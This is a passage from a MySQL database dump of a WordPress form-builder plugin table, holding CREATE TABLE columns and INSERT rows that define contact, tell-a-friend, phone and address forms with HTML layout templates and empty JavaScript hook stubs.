  `from_name` varchar(128) NOT NULL,
  `reply_to` varchar(128) NOT NULL,
  `send_to` varchar(128) NOT NULL,
  `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
  `custom_front` longtext NOT NULL,
  `mail_from_user` varchar(128) NOT NULL,
  `mail_from_name_user` varchar(128) NOT NULL,
  `reply_to_user` varchar(128) NOT NULL,
  `condition` text NOT NULL,
  `mail_cc` varchar(128) NOT NULL,
  `mail_cc_user` varchar(128) NOT NULL,
  `mail_bcc` varchar(128) NOT NULL,
  `mail_bcc_user` varchar(128) NOT NULL,
  `mail_subject` varchar(128) NOT NULL,
  `mail_subject_user` varchar(128) NOT NULL,
  `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
  `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
  `user_id_wd` varchar(220) NOT NULL,
  `sortable` int(11) NOT NULL,
  `frontend_submit_fields` text NOT NULL,
  `frontend_submit_stat_fields` text NOT NULL,
  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0',
  `mail_verify` tinyint(4) NOT NULL DEFAULT '0',
  `mail_verify_expiretime` float NOT NULL,
  `mail_verification_post_id` int(11) NOT NULL,
  `save_uploads` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker`
--

LOCK TABLES `lwz_formmaker` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker` DISABLE KEYS */;
INSERT INTO `lwz_formmaker` VALUES (1,'Contact Us with Captcha','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div><div wdid=\"2\" class=\"wdform_row\">%2 - Name:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Comments:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - Type the characters you see here:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<div><h2>Contact Us</h2><div>Please contact us for specific reasons.</div></div><p></p>*:*w_editor*:**:*new_field*:*2*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Type the characters you see here:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,663,1),(2,'Tell a Friend','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div></div></div><div wdid=\"2\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%2 - custom_2%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"3\" class=\"wdform_row\">%3 - From:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - To:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - Message:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h1>Tell a Friend</h1>*:*w_editor*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*From:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_text*:*type*:*To:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(3,'Simple Contact','membership@zphiblgz.org,','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Message:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - type_submit_reset_4%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',16,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',1,'%all%','Thank you for contact',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#3#**id**#Website#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Send Now!*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','Thank You for Your Interesting in Zeta Phi Beta Sorority, Inc. ',1,1,1,1,'administrator,',1,'','',0,0,0,663,1),(4,'Advanced Contact Form 2','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - First Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - custom_2%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Last Name:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - custom_4%</div><div wdid=\"5\" class=\"wdform_row\">%5 - E-mail Address:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - custom_6%</div><div wdid=\"7\" class=\"wdform_row\">%7 - Company / Restaurant Name:%</div><div wdid=\"8\" class=\"wdform_row\">%8 - custom_8%</div><div wdid=\"9\" class=\"wdform_row\">%9 - Telephone:%</div><div wdid=\"10\" class=\"wdform_row\">%10 - custom_10%</div><div wdid=\"11\" class=\"wdform_row\">%11 - Alternate Telephone:%</div><div wdid=\"12\" class=\"wdform_row\">%12 - custom_12%</div><div wdid=\"13\" class=\"wdform_row\">%13 - Requirements/ Comments:%</div><div wdid=\"14\" class=\"wdform_row\">%14 - custom_14%</div><div wdid=\"15\" class=\"wdform_row\">%15 - How Did You Hear About Us?%</div><div wdid=\"16\" class=\"wdform_row\">%16 - custom_16%</div><div wdid=\"17\" class=\"wdform_row\">%17 - custom_17%</div><div wdid=\"18\" class=\"wdform_row\">%18 - type_submit_reset_18%</div><div wdid=\"19\" class=\"wdform_row\">%19 - custom_19%</div><div wdid=\"20\" class=\"wdform_row\">%20 - custom_20%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',17,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',21,1,'1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****##**id**##**label**##****#','1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*First Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Last Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_editor*:*type*:*custom_4*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_editor*:*type*:*custom_6*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*7*:*id*:*type_text*:*type*:*Company / Restaurant Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*8*:*id*:*type_editor*:*type*:*custom_8*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*9*:*id*:*type_text*:*type*:*Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*10*:*id*:*type_editor*:*type*:*custom_10*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*11*:*id*:*type_text*:*type*:*Alternate Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*13*:*id*:*type_textarea*:*type*:*Requirements/ Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*14*:*id*:*type_editor*:*type*:*custom_14*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*15*:*id*:*type_text*:*type*:*How Did You Hear About Us?*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*16*:*id*:*type_editor*:*type*:*custom_16*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*17*:*id*:*type_editor*:*type*:*custom_17*:*w_field_label*:** Indicates required fields*:*w_editor*:**:*new_field*:*18*:*id*:*type_submit_reset*:*type*:*type_submit_reset_18*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*19*:*id*:*type_editor*:*type*:*custom_19*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*20*:*id*:*type_editor*:*type*:*custom_20*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(5,'Simple Contact with Phone','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Phone:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Message:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - type_submit_reset_5%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',25,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_submit_reset*:*type*:*type_submit_reset_5*:*w_field_label*:*Submit Form*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(6,'User Credentials','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div></div></div><div wdid=\"2\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%2 - custom_2%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"3\" class=\"wdform_row\">%3 - custom_3%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - E-mail:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - Phone:%</div><div wdid=\"7\" class=\"wdform_row\">%7 - Mobile Phone Number:%</div><div wdid=\"8\" class=\"wdform_row\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row\">%14 - Message Inquiry / Comments:%</div><div wdid=\"15\" class=\"wdform_row\">%15 - type_submit_reset_15%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',34,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',16,1,'1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_editor*:*type*:*custom_3*:*w_field_label*:*<h3>            How do we contact you          </h3>*:*w_editor*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_phone*:*type*:*Mobile Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_textarea*:*type*:*Message Inquiry / Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*15*:*id*:*type_submit_reset*:*type*:*type_submit_reset_15*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(7,'Simple Contact Captcha','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Phone:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div></div><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - Enter the message as it&#039;s shown:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - Message:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',19,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	